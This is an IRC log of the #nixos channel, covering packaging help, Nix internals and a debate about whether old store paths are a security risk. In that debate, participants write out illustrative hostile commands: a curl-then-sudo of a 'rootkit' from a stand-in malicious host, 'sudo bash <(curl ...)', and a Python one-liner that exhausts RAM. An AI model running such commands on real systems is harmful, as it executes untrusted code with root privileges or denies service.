<sphalerite> also, if you're running it from systemd it might make sense not to tie it to X, and use the sysfs interface to control the backlight instead (write to /sys/class/backlight/<id>/brightness)
<mojjo> it looks like this in the service cfg (for testing): `systemd.service.something.script = "${pkgs.xorg.xbacklight}/bin/xbacklight -d ":0.0" > /tmp/out 2>&1"`
<mojjo> cat /tmp/out : No protocol specified \n RANDR Query Version returned error -1
<bennofs> mojjo: i don't think the system systemd instance has access to X11
<sphalerite> mojjo: that'll be because it doesn't have permission to access X
<sphalerite> it needs XAUTHORITY or something. But again, it's probably a nicer option to use the sysfs interface
<sphalerite> that way it'll work regardless of how many X servers you're running (including if it's 0)
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<mojjo> alright, thanks for the hints. I'll check them out later with more time..
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<NixOS_GitHub> [nixpkgs] womfoo opened pull request #25241: update asterisk-stable and asterisk-lts (master...bump/asterisk) https://git.io/v9Ypu
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<NickHu> I'm trying to package a python 3 library that's on pip, but it complains about futures not being available
<NickHu> I can import concurrent.futures just fine however
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<bennofs> NickHu: how does your package look?
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<bennofs> NickHu: is this inside nixpkgs python-packages.nix or a separate file?
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<bennofs> NickHu: I get Could not find a version that satisfies the requirement futures>=3.0.0 (from IndicoIo==1.0.8) (from versions: )
<bennofs> NickHu: when i try to build it
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<gilligan_> hi
<gilligan_> *help*: nixpkgs-unstable has been broken for me because of https://github.com/NixOS/nixpkgs/pull/24969 which still hasn't made it to the channel. Can this be sped up somehow? Can someone help me out? The broken broadcom-sta package should impact quite some people I would assume
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<bennofs> NickHu: seems this package requires python2?
<LnL> gilligan_: unstable updated yesterday http://howoldis.herokuapp.com
<gilligan_> LnL, it's still broken. I guess it updated yesterday to a commit prior to the fix ;/
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<LnL> and 17.03 also updated recently, so I would assume it works now
<bennofs> gilligan_: nixos-unstable channel has that commit
<bennofs> gilligan_: and so does nixpkgs-unstable
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<LnL> in general if you want to help getting a channel update, you can look at the job and try to help fixing the issues
<gilligan_> well sorry for my false alarm in that case - i just ran nix-channel --update again and started nixos-rebuild. Which has me slightly irritated because I thought I *just* updated ....
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<gilligan_> LnL, bennofs: to be honest that is something that still confuses me: The process of the channel updates.
<gilligan_> Lets say that for the sake of argument I need some arbitrary commit X in my channel
<LnL> what do you mean?
<bennofs> gilligan_: see http://howoldis.herokuapp.com/ "how does the channel update" ?
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<gilligan_> i know that description
<bennofs> gilligan_: hmm ok. so what is your question?
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<gilligan_> oops - that was the network service restarting.. ;}
<gilligan_> bennofs, i was going to say: i know that description. But frankly I still wouldn't know where to look for "the job and help fixing the issues" as LnL put it
<LnL> the "Hydra job for tests" column
<LnL> when all of those subjobs are green the channel will be updated by that job
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<gilligan_> alrighty - thanks for the clarification LnL
<LnL> also nix-channel literally just downloads a tarball so you could use your own git branch as a channel
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<gilligan_> yes, it wasn't about me not being able to get a working system. I could also just have overriden the broken package
<gilligan_> it was more like me being worried that it was broken for so long.
<avn> Folks, how better to define network depended part of fetchgit' urls in my package definitions? (our git have different addresses/ports from different networks)
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<exarkun> ./include/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/f
<exarkun> reetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype2/freetype/ftttdrv.h
<LnL> lol
<exarkun> something wrong with the freetype2 packaging?
<avn> looks like bug
<sphalerite> No I think that's totally intentional behaviour
<sphalerite> :p
<LnL> is include/freetype2 a symlink?
<Dezgeg> I suppose it's compatibility for some packages including <freetype_foo.h> and some <freetype2/freetype_foo.h>
<Dezgeg> (really irritating)
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<LnL> ^ yeah it looks like include/freetype2 might be a symlink back to include or something
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<exarkun> when docker.buildImage encounters this, it doesn't do something very smart (it resolves the symlink as deep as it can and then I guess it dies because a path is too long)
<avn> Then it bug in docker.buildImage
<LnL> euh, it should probably not resolve/look inside symlinks like htat
<avn> also, why you need -dev stuff in docker image?
<exarkun> never said I needed it :)
<exarkun> I don't know what dragged it in. Something.
<LnL> probably something that should be a buildInput instead of a propagatedBuildInput
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<LnL> avn: since the url/repo doesn't matter for the output hash of fetchurl/fetchgit you can do this outside of the expression and use an expression argument or builtins.getEnv to pass it in
<copumpkin> what is nix-hash doing on a single file if I don't pass in --flat?
<copumpkin> I expected it to be looking at the nar serialization of that file
<copumpkin> but in that case I'd expect it to consider the filename in the hash as well
<copumpkin> and that isn't the case
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<bennofs> copumpkin: I think the root file has no name in nars in nix
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<avn> LnL: I am intend to use nixpkgs.config.... section of configuration.nix. Does it enough idiomatic?
<copumpkin> bennofs: weird! that'd make sense to me for folders, but for files seems odd
<bennofs> copumpkin: the nix nar type looks like data Entry = Dir (Map String Entry) | File Content
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<copumpkin> ah
<bennofs> copumpkin: so folders give things names, files themselves have no names
<copumpkin> fair enough then
<copumpkin> I like how we all just assume haskell knowledge in here :D
<bennofs> copumpkin: i know you know haskell :p
<copumpkin> I know you know I know haskell
<bennofs> :d
<copumpkin> but I've seen it use to explain things before in here too :)
<avn> copumpkin: it also give some motivation to learn ;)
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<bennofs> I wonder how to write this in C++. Like struct Entry { boost::variant<std::map<std::string, std::shared_ptr<Entry>>, std::string> content; } ?
<bennofs> a unique_ptr may work as well actually
<clever> bennofs: and this will actualy parse a nar: https://github.com/taktoa/narfuse/blob/master/Main.hs
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* clever heads to bed
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<NickHu> bennofs: That's what I get too, but the package is fine in python3
<bennofs> NickHu: how do you know? futures seems to be not supported for python3, and it depends on futures
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<domenkozar> copumpkin: do you plan to merge disk image build improvements to 17.03?
<copumpkin> domenkozar: I wasn't planning to (feels like a bit more than the usual maintenance backports) but I'm not opposed to it
<NickHu> Futures is supported by importing concurrent.futures instead
<NickHu> The futures package is a backport to python2 of this python3 stdlib
<bennofs> NickHu: yes but the package has a install_requires futures in its setup.py
<bennofs> NickHu: so I don't see how you can install it on non-python2, as it requires `futures`, which is only support on python2
<domenkozar> copumpkin: agreed :) september feels far way :D
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<NickHu> I'll have to double check to be honest, this was handed to me and I'm not a python dev - it's used in a script with a python3 shebang, but I'll ask the person who wrote it
<exarkun> Python 2 and Python 3 are pretty incompatible. Lots of projects explicitly support both but if a project _doesn't_ explicitly support both then it's almost guaranteed it won't work on both.
<jophish> Dezgeg: did you actually manage to compile Go:?
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<jophish> I was unable to despite setting GOARCH and GOHOSTARCH and GOARM
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<Dezgeg> I didn't :P
<Dezgeg> what was the error?
<copumpkin> domenkozar: yeah :) I mostly ignore releases, but eventually won't
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<NixOS_GitHub> [nixpkgs] Ericson2314 closed pull request #25227: Purge binutilsCross (master...cross-purge-binutilsCross) https://git.io/v9YOl
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<NixOS_GitHub> [hydra] edolstra pushed 1 new commit to master: https://git.io/v9Oqx
<NixOS_GitHub> hydra/master 1f94f03 Eelco Dolstra: Fix build
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<sphalerite> When is/was 16.09 supported until again?
<domenkozar> end of this month
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<sphalerite> cool thanks
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<nix-naive> question to nix-os experts, I've read somewhere that nix-os is not so secure with multiple os versions on a computer, is this true, can someone who knows elaborate, I'm trying to improve my nix-os knowledge
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<goibhniu> I haven't heard it talked about, but I guess that having old insecure versions of software (from previous generations) in the store does expose some risk
<exarkun> "not so secure"?
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<nix-naive> this blogger at http://www.gilesorr.com/blog/nixos-review.html states in the last line states,"the whole OS strikes me as a security issue waiting to happen" I
<nix-naive> I am very new to nix-os and so a statement like the one before stood out for me
<exarkun> Just like with any OS, you have to install security updates for software you're using. If there's a difference, it doesn't seem like it would be any bigger than "Debian has a ton of people packaging security updates compared to Nix"
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<LnL> ^ :)
<exarkun> But I'm not even sure that's completely relevant... The difficulty of Debian packaging vs Nix packaging might mean you don't need as many people to keep software up to date.
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<bennofs> nix-naive: as none of the binaries in the nix store can be SUID, I don't think there is a real security vulernability here.
<exarkun> Then again, in reality, it probably actually comes down to the _specific_ maintainer for individual packages. Some will do a good job and others won't.
<bennofs> nix-naive: the only difference is that with nixos, you cannot force the users of the system to use the system software exlusively (but you cannot really do that with other package managers either, they just make it harder to do so)
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<sphalerite> Yeah, by providing an option that actually allows more secure systems (unprivileged software installation), you're putting more of the responsibility for security in the users' hands.
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<orbekk> on a nixos server you could disable the user mode and have an updated system all the time
<exarkun> The main conclusion I take from that blog post is that Nix should officially package the VBox guest additions so people can install them without knowing a ton of low level stuff. :)
<goibhniu> but can't a user potentially get escalated privileges by running an older insecure version of some software?
<exarkun> The way privilege escalation works is you take a component that has escalated privileges and you abuse it to gain the ability to do something it's not supposed to let you do
<sphalerite> no, if that happens that's if there's some such software running in a privileged context already
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<goibhniu> ah, how about setuid wrapped stuff?
<exarkun> The existence of the older insecure version of the software in the nix store doesn't grant it any escalated privileges so you have nothing to abuse
<sphalerite> goibhniu: that's a privileged context
<exarkun> See what bennofs said above: none of the binaries in the nix store can be SUID,
<sphalerite> and has to be installed system-wide, i.e. can't be done by unprivileged users
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<LnL> the only potential issue is running sudo /nix/store/<sha>-unsafe/bin/foo
<LnL> but that's not any different from sudo bash <(curl ...)
<exarkun> yea, that issue exists on all Linux systems
<sphalerite> or sudo foo, when the user has an old and insecure version of foo in their environment (which is a bit more insidious than that)
<dtz> Some people get real worried when there's not a canonical version of each library that can be updated and I think see the flexibility of using different versions simultaneously as a problem? Nix might not make it immediately easy to force update/ensure nothing uses old versions, but a smidge of familiarity with the tools will get you all you need...
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<sphalerite> And reading docs. As he mentioned, he did "minimal reading of the documentation"
<sphalerite> Which just isn't adequate for nixos
<goibhniu> hrm, but doesn't the fact that there are old, insecure versions of things in the store make `sudo /nix/store/<sha>-unsafe/bin/foo` a risk?
<dtz> I guess other than forcing use of a diff library without waiting to recompile, I'm not super convinced of that value but iirc there are things for that too
<exarkun> goibhniu: it's no _more_ a risk than on any other OS
<LnL> yeah, you could nix-store --delete if you're paranoid about some vvulnerablity
<exarkun> goibhniu: Why would you run a command line that?
<goibhniu> but other OSs don't keep old versions of things around
<sphalerite> goibhniu: if the user has sudo privileges, they're basically root and they have full responsibility for the system
<dtz> sudo $untrustedpath seems like the problem there lol
<exarkun> goibhniu: But why would you run a command like that?
<goibhniu> ah, I see ... thanks
<exarkun> goibhniu: You could just as easily run a command like `curl -O http://malicious-attacker.com/rootkit; sudo rootkit`.
<exarkun> goibhniu: But why would you?
<goibhniu> but I guess you could also have some buggy software that eats up RAM or something
<exarkun> Like on every OS?
<sphalerite> yep
<exarkun> It's totally true that there are a _ton_ of crummy attack vectors that exist on Linux
<exarkun> Nix is still basically a Linux OS
<sphalerite> Not just on linux
<goibhniu> except that we have older versions in the store, that's what other OSes don't have
<sphalerite> you can eat RAM on windows and OSX too
<jsgrant__> exarkun: Until SEL4 comes? :^)
<goibhniu> updating isn't the same on NixOS, without garbage collecting too
<exarkun> goibhniu: Maybe you think that running stuff directly out of the store is a common pattern on NixOS?
<goibhniu> it's an attack vector
<exarkun> goibhniu: I don't think it is. I think it is a very uncommon pattern.
<sphalerite> goibhniu: I think a much more effective attack vector is getting users to download software to their home directory without any package manager, and run it from there.
<LnL> thing is that your os configuration will also update it's paths when you do a rebuild
<jsgrant__> There just has to be so many inroads to attack through GCC at this point too, how massive it is.
<sphalerite> goibhniu: and that one's actually common, unlike "run stuff from a specific nix store path"
<goibhniu> a normal user account on the system could potentially take the system down in a way that isn't possible
<goibhniu> ... on other systems
<sphalerite> no, it couldn't.
<exarkun> goibhniu: It's not like you need some bad old software to use up all RAM on a system.
<goibhniu> hehe, true
<sphalerite> ^
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<jsgrant__> Compiler exploits scare me unreasonably more than others in the stack.
<sphalerite> python -c 'open("/dev/zero").read()'
<sphalerite> ^ eats all the RAM
<goibhniu> this is comforting :D
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<dash> goibhniu: "cheer up, everything is this bad"
<sphalerite> jsgrant__: "Reflections on trusting trust"?
<goibhniu> \o/
<jsgrant__> sphalerite: Yeah, that comes to mind and a few others. The more I started getting intereseted in lower-end work, the more I started to pull on my collar from the thought of it all.
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<sphalerite> yeah, the compiler bootstrap model is kind of terrifying
<sphalerite> and all the nonfree stuff right at the bottom of the stack
<dash> sphalerite: only if there's only one compiler
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<dash> sphalerite, jsgrant__: https://www.dwheeler.com/trusting-trust/
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<niksnut> copumpkin: ikwildrpepper is back today
<niksnut> copumpkin: regarding nix extensibility, I don't think so
<niksnut> I've never really seen the point of git extensibility either
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<jsgrant__> exarkun: GNOME, I think is the best opensource "normal-user centered desktop" atm & is a criminal offender of this; Constantly maxing out ram. You practically NEED 6gb in my expereience, for the whole system not to be locking into swap doing trivial things.
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<Yaniel> jsgrant__: I've been considering trying GNOME again (atm using plasma5) am I safe with my 24GB RAM?
<exarkun> jsgrant__: top says chrome is the worst offender, firefox the second, and I can't make my terminal big enough for it to show me anything gnome-related
<sphalerite> jsgrant__: Cinnamon is nice too
<domenkozar> niksnut: do you want to finish new nix ui for 1.12?
<sphalerite> dash: looks interesting
<niksnut> domenkozar: no
<niksnut> I think the "nix install" stuff should wait for 2.0
<domenkozar> niksnut: I'm curious to hear what's missing for 1.12
<NixOS_GitHub> [nixpkgs] lsix opened pull request #25243: Update pythonPackages.channels and dependencies (master...update_channels) https://git.io/v9OCD
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<copumpkin> niksnut: yeah me neither :)
<jsgrant__> Yaniel: :^) Anything above 8gb and you're golden it seems -- especially if you have an ssd, so your system doesn't freak & seemingly idle trying to switch to swap.
<copumpkin> ikwildrpepper: welcome back!!
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<jsgrant__> A bit disappointing that people's standards are so-low that prebuilts are trailing notable behind what is affordable "current gen" stuff.
<dash> jsgrant__: which people
<jsgrant__> dash: The "average computer user".
<domenkozar> niksnut: I mean besides docs and testing
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<domenkozar> or is it that + bugfixes?
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<ToxicFrog> jsgrant__: aren't they always? Some of the money you spend on a prebuilt goes to the labour to pick out the parts and assemble the machine; you've always been able to get more flops for your money by self-building.
<jsgrant__> exarkun: I hear those in approriate channels joke "Emacs is-an OS" all the time; There are those who make the same joke/comparision to "the web" but not as often as one would think. Especially when you really do have OS-stacks that feature the browser/webtech to that degree (ChromeOS + FirefoxOS).
<jsgrant__> ToxicFrog: I hoping beyond hope, that RISC-V & 3D printing brings non-prebuilt laptops to a little more promience.
<jsgrant__> I'm hoping*
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<dash> seems unlikely, laptops have their own engineering challenges
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<dash> jsgrant__: in most fields there's a divide between consumer and professional equipment
<jsgrant__> In-such an extreme minority though of those "who care", & it's so complicated (yeah as dash just said), don't see it becoming feasible unless/if somefactor of home-fabrication also becomes doable.
<jsgrant__> Maybe 20,000 usd thrown in at a hackerspace or something.
<dash> it'd be nice if there was a little more actual pro equipment for programmers.
<jsgrant__> I do think there will be a lot of niche, single-board covers/chasis; Seeing this a lot now already.
<jsgrant__> But doesn't really get you there all the way.
<jsgrant__> :^P
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<goibhniu> jsgrant__: how about EOMA68? http://rhombus-tech.net/
<sphalerite> EOMA68 ♥
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<sphalerite> jsgrant__: I agree that people's standards are ridiculously low though. I was visiting a friend a couple of weeks back and her laptop took several minutes to boot, and the browser took another minute or so to start
<jsgrant__> Heard about it for a year or more-now; Don't exactly understand the hype for it. Especially with that allwinner chip.
<sphalerite> the fact that it's like an rpi but free enough to get RYF?
<jsgrant__> sphalerite: Yeah, I guess I'm just waiting for a RISC-V like-pi SOC that will basically be the same.
<jsgrant__> "FAIF" approved wise.
<sphalerite> FAIF?
<dash> Wonder if that Mill CPU stuff will ever pan out.
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<jsgrant__> 'Free As In Freedom'
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<exarkun> where is runCommand documented?
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<exarkun> or even defined
<dash> exarkun: it's in trivial-builders.nix
<dash> i don't see it in the docs, alas
<dash> exarkun: basically just calls mkDerivation with the given command
<exarkun> Oops. I saw that. But read it as if it were procedural.
<exarkun> thanks
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<gpyh> hi
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<gpyh> I'd like to add a python package but I haven't seen anything in the manual regarding this
<gpyh> it's more geared toward python developpement
<gpyh> the package is available on pip
<exarkun> gpyh: take a look at nixpkgs/pkgs/top-level/python-packages.nix
<gpyh> I did
<gpyh> But I'm suprised I have to add the dependencies manually
<gpyh> isn't it generated somehow?
<exarkun> Ah. Well, you do.
<exarkun> There are some third-party tools that extract the dependencies automatically. You could try those out, perhaps.
<exarkun> That's fine if you just want the packages for yourself.
<gpyh> thanks a lot! :D
<NixOS_GitHub> [nixpkgs] Mic92 pushed 1 new commit to master: https://git.io/v9O4Q
<NixOS_GitHub> nixpkgs/master 9d3c118 Jörg Thalheim: google-compute-image: append .raw.tar.gz suffix...
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<NixOS_GitHub> [nixpkgs] peterhoeg pushed 1 new commit to master: https://git.io/v9OBK
<NixOS_GitHub> nixpkgs/master 4639e68 Peter Hoeg: grc: 1.10.1 -> 1.11
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<NixOS_GitHub> [nixpkgs] Mic92 pushed 4 new commits to master: https://git.io/v9OBS
<NixOS_GitHub> nixpkgs/master 244b575 Chris Hodapp: ezdxf (Python package): init at 0.8.1
<NixOS_GitHub> nixpkgs/master 1e3416c Jörg Thalheim: pythonPackages.ezdxf: fix tests
<NixOS_GitHub> nixpkgs/master 489fa7b Chris Hodapp: ezdxf: Add hodapp as maintainer
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<nix-naive> hello, i'm new to nix-os, my install is 17.03.994.67c6638b08 (Gorilla) nix-env (Nix) 1.11.8 "17.03.994.67c6638b08" my question is, is nix-os gnu libre fsf certified?
<bennofs> nix-naive: i don't think so. if you're looking for that, you may like guixsd
<NixOS_GitHub> [nixpkgs] Mic92 opened pull request #25244: meson: 0.35.0 -> 0.40.0 (master...meson) https://git.io/v9ORI
<exarkun> Can I have a different interpreter for a mkDerivation builder?
<bennofs> nix-naive: eh I meant https://www.gnu.org/software/guix/
<exarkun> Apparently just setting #! doesn't do it
<bennofs> exarkun: builder? as in, you're setting `builder = ...` ?
<exarkun> bennofs: yes
<exarkun> Or: What's a good way to define the logic for a builder in Python instead of shell?
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<copumpkin> the derivation mechanism under mkDerivation doesn't assume shell
<copumpkin> you could also make a simple wrapper around runCommand that dumps your python build to a store file and executes that
<nix-naive> thanks bennofs!
<exarkun> I pass a .py file with `#!/bin/env python` as the builder to mkDerivation and it failed in a way that makes it look like it's being evaluated with sh
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<exarkun> "/nix/store/9y2x5q1ppf3yd907xvjmmmprc31q5fyc-build-docker-image.py: line 3: from: command not found"
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<simukis_> lol, so my goes through like 4 wrapper shell scripts before actual binary is invoked
<simukis_> my nvim*
<gpyh> does anyone use elastic beanstalk cli on nixos?
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<NixOS_GitHub> [nixpkgs] bachp opened pull request #25245: docker: pass all proxy variables to docker daemon (master...docker-proxy) https://git.io/v9O0X
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<NixOS_GitHub> [nix] edolstra pushed 1 new commit to master: https://git.io/v9OEi
<NixOS_GitHub> nix/master 98a2adb Eelco Dolstra: Simplify building nix-perl in nix-shell
<exarkun> so, no idea on using a Python builder with mkDerivation?
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<dash> exarkun: hmm
<dash> exarkun: stdenv.mkDerivation is a wrapper around the builtin 'derivation'
<dash> so, at worst you can build something up from there
* dash looks at mkDerivation
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<nix-naive> hello nix experts,I'm new to nix-os.question i have is how is nix-os features like nix-os rebuild, test, boot different from Windows Restore points
<gchristensen> oh my gosh everybody
<gchristensen> F# recommends Nix
<dash> nix-naive: different philosophy entirely
<gchristensen> we need to make these install directions better :(
<dash> nix-naive: restore points is about saving a snapshot of current state, nix's stuff is about building an entire system from a description
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<nix-naive> thanks dash: does that mean i can have 500 differently described system on my hard drive hypothetically?
<ozer> trying to build python35Packages.numpy with plain blas instead of openblas
<dash> exarkun: hm.... if i'm reading this right, you can set 'realBuilder' and 'args' instead of 'builder'
<dash> nix-naive: sure why not.
<ozer> it just continues to use openblas
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<nix-naive> <dash> that would be great how can i call these 500 different builds, with unique names. where can i do that? i am very new to this
<hodapp> weird. https://github.com/NixOS/nixpkgs/pull/25103 has some strange "cycle detected" message in the OS X build
<hodapp> but I haven't looked in detail to see if other Go packages build fine on OS X
<ozer> sorry, updated gist
<dash> nix-naive: by default, nixos-rebuild adds grub menu entries for old versions
<gchristensen> hodapp: what is the error texet?
<ozer> so throwing oldAttrs.passthru.blas shows openblas, so you'd think overriding it with blas would rebuild with blas and not openblas
<exarkun> dash: aha. thanks, I'll try that.
<hodapp> gchristensen: hey, thanks
<hodapp> that's the one
<nix-naive> <dash>thanks. i really would like to tell windows people to switch to this, nix-os sounds very good to me, in fact i myself am liking it a lot. thats why my curiosity,
<hodapp> oh, I dread going back to Windows and having to futz with development environments there
<hodapp> I've started using Nix for most of my development stuff, whether that's R, C#, Python, or Haskell
<dash> nix-naive: windows and nixos are good for different things
<exarkun> What's a good way to get the path to the Python executable? "${pkg.python}/bin/python"?
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<ozer> nix-naive: that's a nice initiative, although I imagine it'd be hard to introduce NixOS directly to windows people, let alone a DIY Linux distribution, let alone Linux
<exarkun> dash: setting realBuilder and args did work, thanks
<dash> exarkun: amazing!
<ozer> any ideas about numpy?
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<nix-naive> <dash> I want to remove a normal user(joe) from nogroup (gid = 65534) i tried using gpasswd to remove this user from that gid 65534, logged off, still no go. what am i doing wrong?
<hodapp> ozer: how are you verifying that it's using openblas?
<ryantrinkle> is it possible to nixos-login to a container without a password?
<exarkun> Hmm but something eats the output?
<ozer> by setting `passthru = (throw (lib.showVal oldAttrs.passthru))};`
<ozer> without the }
<ozer> `passthru = (throw (lib.showVal oldAttrs.passthru.blas));` ***
<ozer> sorry
<exarkun> What's the hry88sj0abdcdx799b9x30hh703q8d3w part of a path like /nix/store/hry88sj0abdcdx799b9x30hh703q8d3w-docker-image-foo.tar.gz.drv called?
<ozer> take that in the context of the gist
<nix-naive> <dash and ozer> any ideas why nix-os people, groups are not promoting more aggressive t-shirt, stickers to promote functional nix-os?
<ozer> you can also see in top-level/python-packages.nix, buildNumpyPackage passes numpy blas = openblas
<hodapp> prolly because we just want our stuff to work
<exarkun> It seems like contents of the builder aren't factored in to whatever different-inputs-produce-different-outputs magic nix does for most stuff
<hodapp> not because we want VCs to have a field day over us
<ozer> I'd love nixos tshirts tho
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<gchristensen> shirts are expensive :)
<gchristensen> I buy stickers to give out, but even those are expensive, $80 for 100.
<goibhniu> nix-naive: there are some nice stickers on sticker mule IIRC
<nix-naive> I was wrong, I found nix-os t-shirt at this place, http://www.cafepress.com/mf/36650181/thinkpure_tshirt?shop=NixOS&productId=418732800
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<exarkun> Can I get my builder to dump output to where I'm running nix-build somehow? It seems like it works fine for shell scripts and not at all if I change realBuilder. :/
<goibhniu> unfortunately, that's the old logo, and the quality isn't so great
<> changed the topic of #nixos to: gchristensen has changed topic for #nixos to: "https://nixos.org || Latest NixOS: https://nixos.org/nixos/download.html || Latest Nix: https://nixos.org/nix/download.html || Logs: https://botbot.me/freenode/nixos/ || Darwin: ##nix-darwin"
<goibhniu> nice :D
<ozer> hodapp: can you see how it's using openblas?
<goibhniu> the NixCon t-shirts were awesome
<nix-naive> thanks gchristensen, have to get some. back to nix-os topic, how do i run emacs in nix-shell or is there such a thing i could do?
<gchristensen> fwiw it is NixOS or nixos not nix-os
<hodapp> it's Nix-O's, like the cereal
* gchristensen stares at hodapp
* hodapp stares at gchristensen
<gchristensen> ;)
* hodapp quietly hides behind the coffeemaker
<nix-naive> thank you <gchristensen> I appreciate you guys sense of humor, :)
<NixOS_GitHub> [nixpkgs] yuriaisaka opened pull request #25247: imagej: init at 150 (master...add-imagej) https://git.io/v9OVr
<gchristensen> but you can do nix-shell -p emacs, then run emacs
<hodapp> ozer: looking, but trying to see why you are using the method you are and I don't know Nix especially well
<hodapp> my config.nix has python35opencv = pkgs.python35Packages.opencv3.override { enableContrib = true; }; for instance so I'm wondering why that method isn't appropriate
<nix-naive> those windows and apple guys are really good at marketing thier non-pure oss. I support NixOS though i am very new
<gchristensen> apple and microsoft have hundreds of billions of dollarss :)
<gchristensen> we have probably whole hundreds of dollars
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<nix-naive> but we have 7 billion poor people with cheap laptops 4GB Ram, and 250GB hard drive, When torvalds released his os he had no idea it would go in the billions
<hodapp> pretty sure a whole lot of people don't have access to laptops like that
<exarkun> nix-naive: what's your plan?
<exarkun> nix-naive: give out stickers?
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<hodapp> my plan is to put a NixOS tattoo on my butt and show it to everyone
<hodapp> preferably at bars, late at night
<nix-naive> <earkun>yes give out stickers, talk to cs, engineering students, high school students, system admins, and others who show interests
<dash> nix-naive: use it to do something awesome, and people will get excited :)
<ozer> hodapp: those appear to be the function arguments, not the attributes of the derivation
<gchristensen> nix-naive: that is what I do, too
<exarkun> How do I take a set of derivations and get their outputs so I can pass them to a builder script?
<ozer> I've tried passing the blas argument as blas (not openblas) but doesn't seem to work
<ozer> clever: ?
<nix-naive> <hoadapp>you're right not many people have that kind of laptops but some do have 2GB, 250GB hard drive running Tinycore. Will there be a Tinycore like NixOS?
<dash> exarkun: tricky
<dash> exarkun: An arbitrary set? or do you know their names
<exarkun> I got them passed as an argument
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<dash> exarkun: mmh
<shlevy> niksnut: forcing an import-from-derivation as part of a filterSource breaks things because the filter function is called while sending a daemon command and the import-from-derivation sends its own commands
<shlevy> niksnut: Any idea how to sanely fix? :'(
<exarkun> It seems to me that the docker module in nixpkgs must be doing something like this but I can't follow the code. It takes a set of derivations as `contents` and somehow mashes them all together with some shell.
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<dash> exarkun: ah yeah, having a look
<dash> exarkun: ok i learned something
<dash> exarkun: I knew that stringifying a derivation would produce the output path for it
<dash> exarkun: I did not know that stringifying a _list_ of derivations would make a space separated list of paths
<exarkun> okay cool so I just have to treat it like a string and it will do something kind of useful... I guess I need to stop having a _set_ and start having a _list_ though?
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<nix-naive> Nix experts, I would like to have the ability to adjust my sound, e.g. volume up and down in Nix-OS, I don't know where to begin, can someone share their knowledge how to do this? my nixos/configuration.nix file is here, https://pastebin.com/s3hx7GdG thanks
<NixOS_GitHub> [nixpkgs] grahamc pushed 1 new commit to master: https://git.io/v9Oo8
<NixOS_GitHub> nixpkgs/master a4fc2ee Graham Christensen: python2Packages.packet-python: 1.31 -> 1.33
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<gchristensen> nix-naive: do you know how to adjust sound on other linuxes?
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<nix-naive> <gchristense>hi, Nix-OS is my firs linux I am giving serious thought to, honest answer I don't, i researched it Nix Manual and i didn't understand, am very deficient in my knowledge right now
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<exarkun> blech networks.
<NixOS_GitHub> [nix] edolstra pushed 1 new commit to master: https://git.io/v9OKx
<NixOS_GitHub> nix/master 45ce2c7 Eelco Dolstra: Doh
<ToxicFrog> nix-naive: in most desktop environments (gnome, kde, xfce, etc) you can use the volume-adjust keys on your keyboard
<Yaniel> nix-naive: the plasma toolbar should have a volume icon
<exarkun> did what I said about stringifying contents go through before I got disconnected?
<ToxicFrog> If you don't have those, click the volume icon in the taskbar
<Yaniel> and if your keyboard has volume control keys those should work too
<ToxicFrog> If you need to do this from the command line, there's probably something you can do with pacmd and/or pactl?
<nix-naive> <gchristensen> when i type suond in Nix-OS search, it gave me Phonon Audio Video, I went through the list and didn't find a volume adjuster
<ToxicFrog> nix-naive: the volume settings are part of the volume icon in the taskbar, just like in windows and OSX
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<goibhniu> nix-naive: it's probably a good idea to enable pulseaudio
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<nix-naive> <ToxicFrog> I looked in taskbar and no volume control key exist, i see printer, batteries and digital clock in system tray
<goibhniu> nix-naive: hardware.pulseaudio.enable = true;
<nix-naive> thanks <goibhniu> I will put that line in config file and give it a try. thanks you guys very helpful
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<NixOS_GitHub> [nixpkgs] yuriaisaka closed pull request #25247: imagej: init at 150 (master...add-imagej) https://git.io/v9OVr
<dash> exarkun: maybe you want builtins.attrValues?
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<exarkun> dash: it occurred to me to trace the value it is trying to coerce
<exarkun> trace: [ <CODE> ]
<exarkun> :/
<exarkun> still looks like a list, not a set, to me
<exarkun> but I don't really know what's going on now
<dash> exarkun: try 'trace (builtins.toString thing) ...' instead and see if that gets you any closer
<dash> trace won't always eval stuff IME
<manveru> you'll have to pass the thing twice to trace
<manveru> once to output, once to return
<dash> yep
<exarkun> I tried attrValues on the thing, it complained that it was a list and not a set
<exarkun> toString fails "cannot coerce a set to a string"
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<manveru> i'd give my cookie vape juice for a nix pretty printer in stdenv.lib :)
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<exarkun> `contents` is [ result_of_buildPythonPackage { ... } ] fwiw
<exarkun> I thought that should give me a derivation but I dunno
<Dezgeg> builtins.toJSON is sometimes sufficient
<joachifm> copumpkin: did you see the recent grsec announcement?
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<exarkun> toJSON returns http://codepad.org/8fnTSxxP
<manveru> maybe a mkDerivation of toJSON and jq?
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<copumpkin> joachifm: nope, what?
<exarkun> So I guess it's a list of a set?
<dash> exarkun: looks like it
<exarkun> I don't understand. But maybe that's just what buildPythonPackage does... produce multiple outputs instead of one?
<joachifm> copumpkin: no more free testing patches from upstream
<dash> exarkun: Yes, this is pretty common for some stuff
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<exarkun> so I have to write a recursive list-of-derivation-or-this-data-type flattener to get just the derivations, I guess
<joachifm> copumpkin: it'll become a community thing now, whatever that means
<copumpkin> joachifm: dammit
<exarkun> guess I'll eat lunch first
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<copumpkin> joachifm: ah, they're just sick of maintaining the patches?
<copumpkin> So community would resolve conflicts etc.?
<copumpkin> Their site isn't loading for me
<dash> exarkun: :-(
<joachifm> copumpkin: not for me, either, so I don't know the details
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<joachifm> copumpkin: I'm guessing they'll provide a "clean" patch for 4.9 and let people work from that going forward
<dash> exarkun: what's the situation where you encounter this shape?
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<joachifm> copumpkin: previous patches have been mixed, making it difficult to maintain grsec for other kernels than the one they released the patch for
<copumpkin> Ah apparently speculation is that the KSPP is why they're taking this offline
<joachifm> copumpkin: oh, well they've not been to kind to them in the changelogs :)
<niksnut> shlevy: why? I would expect the recursive call to get a new connection from the pool
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<shlevy> niksnut: on 1.12 it hangs forever
<joachifm> copumpkin: calling their pax ports "ripoffs" &c
<shlevy> on 1.11 it causes an error
<shlevy> niksnut: testing a fix now
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<niksnut> because of the connection limit?
<shlevy> niksnut: test case: http://sprunge.us/IicA
<shlevy> niksnut: no idea
<shlevy> niksnut: the above works if you seq true-imported first
<NixOS_GitHub> [nixpkgs] vcunat pushed 1 new commit to master: https://git.io/v9OXo
